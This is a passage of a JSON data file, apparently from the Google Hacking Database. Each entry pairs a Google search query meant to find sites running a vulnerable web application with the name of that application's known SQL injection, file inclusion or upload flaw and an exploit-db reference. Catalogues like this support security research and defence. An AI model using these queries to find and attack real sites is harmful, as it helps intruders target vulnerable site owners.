"MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: http://www.exploit-db.com/exploits/6725" }, { "signatureReferenceNumber": "1855", "link": "https://www.exploit-db.com/ghdb/1855/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Blox+CMS+from+TownNews.com", "shortDescription": "Powered by Blox CMS from TownNews.com", "textualDescription": "Blox CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12729" }, { "signatureReferenceNumber": "1856", "link": "https://www.exploit-db.com/ghdb/1856/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl+:%22wp-content/plugins/st_newsletter%22", "shortDescription": "allinurl :\"wp-content/plugins/st_newsletter\"", "textualDescription": "Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: http://www.exploit-db.com/exploits/5053" }, { "signatureReferenceNumber": "1857", "link": "https://www.exploit-db.com/ghdb/1857/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22%C2%A9+2008+DevWorx+-+devworx.somee.com%22", "shortDescription": "\"\u00a9 2008 DevWorx - devworx.somee.com\"", "textualDescription": "TermiSBloG V 1.0 SQL Injection(s) Vulnerability: http://www.exploit-db.com/exploits/11081" }, { "signatureReferenceNumber": "1858", "link": "https://www.exploit-db.com/ghdb/1858/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22links_showcat.php%3F%22", "shortDescription": "inurl:\"links_showcat.php?\"", "textualDescription": "Dlili Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11318" }, { "signatureReferenceNumber": "1859", "link": "https://www.exploit-db.com/ghdb/1859/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+SH-News+3.0", "shortDescription": "Powered by SH-News 3.0", "textualDescription": "SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: http://www.exploit-db.com/exploits/4709" }, { "signatureReferenceNumber": "1860", "link": "https://www.exploit-db.com/ghdb/1860/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22CaLogic+Calendars+V1.2.2%22", "shortDescription": "\"CaLogic Calendars V1.2.2\"", "textualDescription": "CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: http://www.exploit-db.com/exploits/5607" }, { "signatureReferenceNumber": "1861", "link": "https://www.exploit-db.com/ghdb/1861/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_pollxt%22", "shortDescription": "inurl:\"com_pollxt\"", "textualDescription": "pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: http://www.exploit-db.com/exploits/2029" }, { "signatureReferenceNumber": "1862", "link": "https://www.exploit-db.com/ghdb/1862/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PHP+Links+from+DeltaScripts", "shortDescription": "Powered by PHP Links from DeltaScripts", "textualDescription": "PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: http://www.exploit-db.com/exploits/5021" }, { "signatureReferenceNumber": "1864", "link": "https://www.exploit-db.com/ghdb/1864/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_calendario", "shortDescription": "inurl:index.php?option=com_calendario", "textualDescription": "Joomla Component com_calendario Blind SQL injection Vulnerability: http://www.exploit-db.com/exploits/10760" }, { "signatureReferenceNumber": "1865", "link": "https://www.exploit-db.com/ghdb/1865/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PNphpBB2+/+Powered+por+PNphpBB2", "shortDescription": "Powered by PNphpBB2 / Powered por PNphpBB2", "textualDescription": "PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: http://www.exploit-db.com/exploits/2390" }, { "signatureReferenceNumber": "1866", "link": "https://www.exploit-db.com/ghdb/1866/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Nukedit%22", "shortDescription": "\"Powered by Nukedit\"", "textualDescription": "Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: http://www.exploit-db.com/exploits/7491" }, { "signatureReferenceNumber": "1867", "link": "https://www.exploit-db.com/ghdb/1867/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+%22vcart+3.3.2%22", "shortDescription": "Powered by \"vcart 3.3.2\"", "textualDescription": "vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: http://www.exploit-db.com/exploits/4889" }, { "signatureReferenceNumber": "1868", "link": "https://www.exploit-db.com/ghdb/1868/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+SkaLinks", "shortDescription": "Powered by SkaLinks", "textualDescription": "SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: http://www.exploit-db.com/exploits/7932" }, { "signatureReferenceNumber": "1869", "link": "https://www.exploit-db.com/ghdb/1869/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22mirco+blogging%22", "shortDescription": "\"mirco blogging\"", "textualDescription": "x10 mirco blogging V121 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12042" }, { "signatureReferenceNumber": "1871", "link": "https://www.exploit-db.com/ghdb/1871/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22G%C3%A9n%C3%A9r%C3%A9+par+KDPics+v1.18%22", "shortDescription": "\"G\u00e9n\u00e9r\u00e9 par KDPics v1.18\"", "textualDescription": "G\u00e9n\u00e9r\u00e9 par KDPics v1.18 Remote Add Admin: http://www.exploit-db.com/exploits/11455" }, { "signatureReferenceNumber": "1873", "link": "https://www.exploit-db.com/ghdb/1873/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22nabopoll/%22", "shortDescription": "inurl:\"nabopoll/\"", "textualDescription": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: http://www.exploit-db.com/exploits/3315" }, { "signatureReferenceNumber": "1874", "link": "https://www.exploit-db.com/ghdb/1874/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl+:%22modules/eblog%22", "shortDescription": "allinurl :\"modules/eblog\"", "textualDescription": "eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5253" }, { "signatureReferenceNumber": "1875", "link": "https://www.exploit-db.com/ghdb/1875/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By+DataLife+Engine", "shortDescription": "Powered By DataLife Engine", "textualDescription": "DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: http://www.exploit-db.com/exploits/9572" }, { "signatureReferenceNumber": "1876", "link": "https://www.exploit-db.com/ghdb/1876/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22%C2%A9+Sabdrimer+CMS%22", "shortDescription": "\"\u00a9 Sabdrimer CMS\"", "textualDescription": "Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: http://www.exploit-db.com/exploits/1996" }, { "signatureReferenceNumber": "1877", "link": "https://www.exploit-db.com/ghdb/1877/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=AlstraSoft+Web+%22ESE%22", "shortDescription": "AlstraSoft Web \"ESE\"", "textualDescription": "AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: http://www.exploit-db.com/exploits/7596" }, { "signatureReferenceNumber": "1881", "link": "https://www.exploit-db.com/ghdb/1881/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Maian+Cart+v1.1", "shortDescription": "Powered by Maian Cart v1.1", "textualDescription": "Maian Cart 1.1 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6047" }, { "signatureReferenceNumber": "1883", "link": "https://www.exploit-db.com/ghdb/1883/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Thyme+1.+%C3%82%C2%A9+2006+eXtrovert+Software+LLC.+All+rights+reserved", "shortDescription": "Thyme 1. \u00c2\u00a9 2006 eXtrovert Software LLC. All rights reserved", "textualDescription": "Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: http://www.exploit-db.com/exploits/8029" }, { "signatureReferenceNumber": "1884", "link": "https://www.exploit-db.com/ghdb/1884/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=eXV2+MyAnnonces", "shortDescription": "eXV2 MyAnnonces", "textualDescription": "eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: http://www.exploit-db.com/exploits/5252" }, { "signatureReferenceNumber": "1886", "link": "https://www.exploit-db.com/ghdb/1886/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22BlogMe+PHP+created+by+Gamma+Scripts%22", "shortDescription": "\"BlogMe PHP created by Gamma Scripts\"", "textualDescription": "BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: http://www.exploit-db.com/exploits/5533" }, { "signatureReferenceNumber": "1887", "link": "https://www.exploit-db.com/ghdb/1887/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/go/_files/%3Ffile%3D%22", "shortDescription": "inurl:\"/go/_files/?file=\"", "textualDescription": "SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: http://www.exploit-db.com/exploits/4282" }, { "signatureReferenceNumber": "1888", "link": "https://www.exploit-db.com/ghdb/1888/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22option%3Dcom_camelcitydb2%22", "shortDescription": "inurl:\"option=com_camelcitydb2\"", "textualDescription": "Joomla CamelcityDB 2.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14530" }, { "signatureReferenceNumber": "1889", "link": "https://www.exploit-db.com/ghdb/1889/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PacerCMS", "shortDescription": "Powered by PacerCMS", "textualDescription": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5098" }, { "signatureReferenceNumber": "1890", "link": "https://www.exploit-db.com/ghdb/1890/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_expshop", "shortDescription": "inurl:com_expshop", "textualDescription": "Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: http://www.exploit-db.com/exploits/5893" }, { "signatureReferenceNumber": "1891", "link": "https://www.exploit-db.com/ghdb/1891/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Sitedesign+by:+Dieleman+www.dieleman.nl+-+Copyright+%C2%A9+2010%22", "shortDescription": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright \u00a9 2010\"", "textualDescription": "Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12701" }, { "signatureReferenceNumber": "1892", "link": "https://www.exploit-db.com/ghdb/1892/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22ITech+Bids%22", "shortDescription": "intitle:\"ITech Bids\"", "textualDescription": "ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: http://www.exploit-db.com/exploits/5056" }, { "signatureReferenceNumber": "1893", "link": "https://www.exploit-db.com/ghdb/1893/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Script+r%C3%A9alis%C3%A9+par+BinGo+PHP%22", "shortDescription": "\"Script r\u00e9alis\u00e9 par BinGo PHP\"", "textualDescription": "BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: http://www.exploit-db.com/exploits/2312" }, { "signatureReferenceNumber": "1894", "link": "https://www.exploit-db.com/ghdb/1894/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+CS-Cart+-+Shopping+Cart+Software", "shortDescription": "Powered by CS-Cart - Shopping Cart Software", "textualDescription": "CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: http://www.exploit-db.com/exploits/1872" }, { "signatureReferenceNumber": "1895", "link": "https://www.exploit-db.com/ghdb/1895/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_colophon", "shortDescription": "inurl:com_colophon", "textualDescription": "Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: http://www.exploit-db.com/exploits/2085" }, { "signatureReferenceNumber": "1896", "link": "https://www.exploit-db.com/ghdb/1896/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22+Powered+by+JTL-Shop+2%22", "shortDescription": "\" Powered by JTL-Shop 2\"", "textualDescription": "JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: http://www.exploit-db.com/exploits/11445" }, { "signatureReferenceNumber": "1898", "link": "https://www.exploit-db.com/ghdb/1898/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Shop+from+DeltaScripts%22", "shortDescription": "\"Powered by PHP Shop from DeltaScripts\"", "textualDescription": "DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: http://www.exploit-db.com/exploits/7025" }, { "signatureReferenceNumber": "1901", "link": "https://www.exploit-db.com/ghdb/1901/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+sNews+%22+inurl:index.php%3Fid%3D", "shortDescription": "\"Powered by sNews \" inurl:index.php?id=", "textualDescription": "sNews (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14458" }, { "signatureReferenceNumber": "1903", "link": "https://www.exploit-db.com/ghdb/1903/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Torbstoff+News+4%22", "shortDescription": "\"Torbstoff News 4\"", "textualDescription": "Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: http://www.exploit-db.com/exploits/2121" }, { "signatureReferenceNumber": "1904", "link": "https://www.exploit-db.com/ghdb/1904/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:Powered+by+MX-System+2.7.3", "shortDescription": "intext:Powered by MX-System 2.7.3", "textualDescription": "MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: http://www.exploit-db.com/exploits/5659" }, { "signatureReferenceNumber": "1905", "link": "https://www.exploit-db.com/ghdb/1905/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+4smart%22", "shortDescription": "\"Powered By 4smart\"", "textualDescription": "Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: http://www.exploit-db.com/exploits/9283" }, { "signatureReferenceNumber": "1906", "link": "https://www.exploit-db.com/ghdb/1906/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+Arcade+Builder%22", "shortDescription": "intext:\"Powered by Arcade Builder\"", "textualDescription": "ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: http://www.exploit-db.com/exploits/4133" }, { "signatureReferenceNumber": "1907", "link": "https://www.exploit-db.com/ghdb/1907/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22intext:Warning:+passthru()%22+%22inurl:view%3Dhelp%22", "shortDescription": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "textualDescription": "PTC Site's RCE/XSS Vulnerability: http://www.exploit-db.com/exploits/12808" }, { "signatureReferenceNumber": "1908", "link": "https://www.exploit-db.com/ghdb/1908/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Fid_menu%3D%22", "shortDescription": "inurl:\"index.php?id_menu=\"", "textualDescription": "CMScontrol 7.x File Upload: http://www.exploit-db.com/exploits/11104" }, { "signatureReferenceNumber": "1909", "link": "https://www.exploit-db.com/ghdb/1909/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By+Coppermine+Photo+Gallery+v1.2.2b+/Powered+By+Coppermine", "shortDescription": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "textualDescription": "Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: http://www.exploit-db.com/exploits/2375" }, { "signatureReferenceNumber": "1911", "link": "https://www.exploit-db.com/ghdb/1911/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%C3%82%C2%A9+2005-2006+Powered+by+eSyndiCat+Directory+Software", "shortDescription": "\u00c2\u00a9 2005-2006 Powered by eSyndiCat Directory Software", "textualDescription": "eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: http://www.exploit-db.com/exploits/4183" }, { "signatureReferenceNumber": "1912", "link": "https://www.exploit-db.com/ghdb/1912/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Nabernet%22", "shortDescription": "\"powered by Nabernet\"", "textualDescription": "Nabernet (articles.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11482" }, { "signatureReferenceNumber": "1913", "link": "https://www.exploit-db.com/ghdb/1913/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+VS+PANEL+7.5.5%22", "shortDescription": "\"Powered by VS PANEL 7.5.5\"", "textualDescription": "http://www.exploit-db.com/exploits/9171 - CVE: 2009-3595: http://www.exploit-db.com/exploits/9171" }, { "signatureReferenceNumber": "1914", "link": "https://www.exploit-db.com/ghdb/1914/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=PHPG%C3%83%C2%A9n%C3%83%C2%A9alogie+fonctionne+sur+un+serveur+PHP", "shortDescription": "PHPG\u00c3\u00a9n\u00c3\u00a9alogie fonctionne sur un serveur PHP", "textualDescription": "PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: http://www.exploit-db.com/exploits/9155" }, { "signatureReferenceNumber": "1915", "link": "https://www.exploit-db.com/ghdb/1915/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+easytrade%22", "shortDescription": "\"powered by easytrade\"", "textualDescription": "easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: http://www.exploit-db.com/exploits/5840" }, { "signatureReferenceNumber": "1916", "link": "https://www.exploit-db.com/ghdb/1916/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22articles.php%3Ftopic%3D%22", "shortDescription": "inurl:\"articles.php?topic=\"", "textualDescription": "jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: http://www.exploit-db.com/exploits/4614" }, { "signatureReferenceNumber": "1917", "link": "https://www.exploit-db.com/ghdb/1917/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22classifieds.php%3Fop%3Ddetail_adverts%22", "shortDescription": "inurl:\"classifieds.php?op=detail_adverts\"", "textualDescription": "PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: http://www.exploit-db.com/exploits/5961" }, { "signatureReferenceNumber": "1919", "link": "https://www.exploit-db.com/ghdb/1919/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Emefa+Guestbook+V+3.0%22", "shortDescription": "\"Emefa Guestbook V 3.0\"", "textualDescription": "Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: http://www.exploit-db.com/exploits/7534" }, { "signatureReferenceNumber": "1920", "link": "https://www.exploit-db.com/ghdb/1920/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+webit!+cms", "shortDescription": "powered by webit! cms", "textualDescription": "Webit Cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12744" }, { "signatureReferenceNumber": "1921", "link": "https://www.exploit-db.com/ghdb/1921/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22char.php%3Fid%3D%22+OR+intitle:Minimanager+for+trinity+server", "shortDescription": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "textualDescription": "http://www.exploit-db.com/exploits/12554: http://www.exploit-db.com/exploits/12554" }, { "signatureReferenceNumber": "1922", "link": "https://www.exploit-db.com/ghdb/1922/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22wow+roster+version+1.*%22", "shortDescription": "\"wow roster version 1.*\"", "textualDescription": "WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2109" }, { "signatureReferenceNumber": "1924", "link": "https://www.exploit-db.com/ghdb/1924/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_DTRegister+eventId", "shortDescription": "inurl:com_DTRegister eventId", "textualDescription": "Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: http://www.exploit-db.com/exploits/6086" }, { "signatureReferenceNumber": "1925", "link": "https://www.exploit-db.com/ghdb/1925/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22wow+roster+version+1.5.*%22", "shortDescription": "\"wow roster version 1.5.*\"", "textualDescription": "WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: http://www.exploit-db.com/exploits/2099" }, { "signatureReferenceNumber": "1926", "link": "https://www.exploit-db.com/ghdb/1926/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+free+simple+software", "shortDescription": "Powered by free simple software", "textualDescription": "Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: http://www.exploit-db.com/exploits/14672" }, { "signatureReferenceNumber": "1927", "link": "https://www.exploit-db.com/ghdb/1927/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22TR+Newsportal%22+brought+by+TRanx.", "shortDescription": "\"TR Newsportal\" brought by TRanx.", "textualDescription": "TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: http://www.exploit-db.com/exploits/1789" }, { "signatureReferenceNumber": "1928", "link": "https://www.exploit-db.com/ghdb/1928/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Minerva+237", "shortDescription": "Powered by Minerva 237", "textualDescription": "Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: http://www.exploit-db.com/exploits/1908" }, { "signatureReferenceNumber": "1930", "link": "https://www.exploit-db.com/ghdb/1930/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+W3infotech%22", "shortDescription": "\"Powered By W3infotech\"", "textualDescription": "W3infotech ( Auth Bypass ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10222" }, { "signatureReferenceNumber": "1931", "link": "https://www.exploit-db.com/ghdb/1931/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22option%3Dcom_org%22", "shortDescription": "inurl:\"option=com_org\"", "textualDescription": "Joomla Component com_org SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11725" }, { "signatureReferenceNumber": "1932", "link": "https://www.exploit-db.com/ghdb/1932/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+GameSiteScript%22", "shortDescription": "\"Powered by GameSiteScript\"", "textualDescription": "GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: http://www.exploit-db.com/exploits/4159" }, { "signatureReferenceNumber": "1933", "link": "https://www.exploit-db.com/ghdb/1933/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Con-Imedia", "shortDescription": "Powered by: Con-Imedia", "textualDescription": "IMEDIA (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12665" }, { "signatureReferenceNumber": "1934", "link": "https://www.exploit-db.com/ghdb/1934/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=(c)+SriptBux+2008+|+Powered+By+ScriptBux+version+2.50+beta+1", "shortDescription": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "textualDescription": "Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: http://www.exploit-db.com/exploits/6652" }, { "signatureReferenceNumber": "1935", "link": "https://www.exploit-db.com/ghdb/1935/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+twg%22", "shortDescription": "\"powered by twg\"", "textualDescription": "TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: http://www.exploit-db.com/exploits/2158" }, { "signatureReferenceNumber": "1936", "link": "https://www.exploit-db.com/ghdb/1936/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:/phpress/", "shortDescription": "allinurl:/phpress/", "textualDescription": "phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4382" }, { "signatureReferenceNumber": "1937", "link": "https://www.exploit-db.com/ghdb/1937/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22+-site:sendcard.org", "shortDescription": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "textualDescription": "Sendcard 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability - CVE: 2007-2471: http://www.exploit-db.com/exploits/3827" }, { "signatureReferenceNumber": "1942", "link": "https://www.exploit-db.com/ghdb/1942/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:+%22Powered+by+Marinet%22", "shortDescription": "intext: \"Powered by Marinet\"", "textualDescription": "Marinet cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12575" }, { "signatureReferenceNumber": "1943", "link": "https://www.exploit-db.com/ghdb/1943/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=UPublisher", "shortDescription": "UPublisher", "textualDescription": "UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability - CVE: 2006-5888: http://www.exploit-db.com/exploits/2765" }, { "signatureReferenceNumber": "1944", "link": "https://www.exploit-db.com/ghdb/1944/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22Answer+Builder%22++Ask+a+question", "shortDescription": "intitle:\"Answer Builder\" Ask a question", "textualDescription": "Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: http://www.exploit-db.com/exploits/4189" }, { "signatureReferenceNumber": "1945", "link": "https://www.exploit-db.com/ghdb/1945/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22tinybrowser.php%3F%22", "shortDescription": "inurl:\"tinybrowser.php?\"", "textualDescription": "TinyBrowser Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12692" }, { "signatureReferenceNumber": "1946", "link": "https://www.exploit-db.com/ghdb/1946/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22product_desc.php%3Fid%3D%22+Powered+by+Zeeways.com", "shortDescription": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "textualDescription": "ZeeWays Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11087" }, { "signatureReferenceNumber": "1947", "link": "https://www.exploit-db.com/ghdb/1947/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ECShop+v2.5.0%22", "shortDescription": "\"Powered by ECShop v2.5.0\"", "textualDescription": "ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: http://www.exploit-db.com/exploits/8548" }, { "signatureReferenceNumber": "1948", "link": "https://www.exploit-db.com/ghdb/1948/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Photo-Graffix+Flash+Image+Gallery%22", "shortDescription": "\"powered by Photo-Graffix Flash Image Gallery\"", "textualDescription": "Photo Graffix 3.4 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8372" }, { "signatureReferenceNumber": "1949", "link": "https://www.exploit-db.com/ghdb/1949/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22inc_webblogmanager.asp%22", "shortDescription": "\"inc_webblogmanager.asp\"", "textualDescription": "DMXReady Registration Manager 1.1 Arbitrary File Upload Vulnerability - CVE: 2009-2238: http://www.exploit-db.com/exploits/8749" }, { "signatureReferenceNumber": "1950", "link": "https://www.exploit-db.com/ghdb/1950/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:tr.php%3Fid%3D", "shortDescription": "inurl:tr.php?id=", "textualDescription": "Downline Goldmine Category Addon (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6947" }, { "signatureReferenceNumber": "1951", "link": "https://www.exploit-db.com/ghdb/1951/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Fmod%3Djeuxflash", "shortDescription": "inurl:index.php?mod=jeuxflash", "textualDescription": "KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability - CVE: 2008-1759: http://www.exploit-db.com/exploits/5352" }, { "signatureReferenceNumber": "1952", "link": 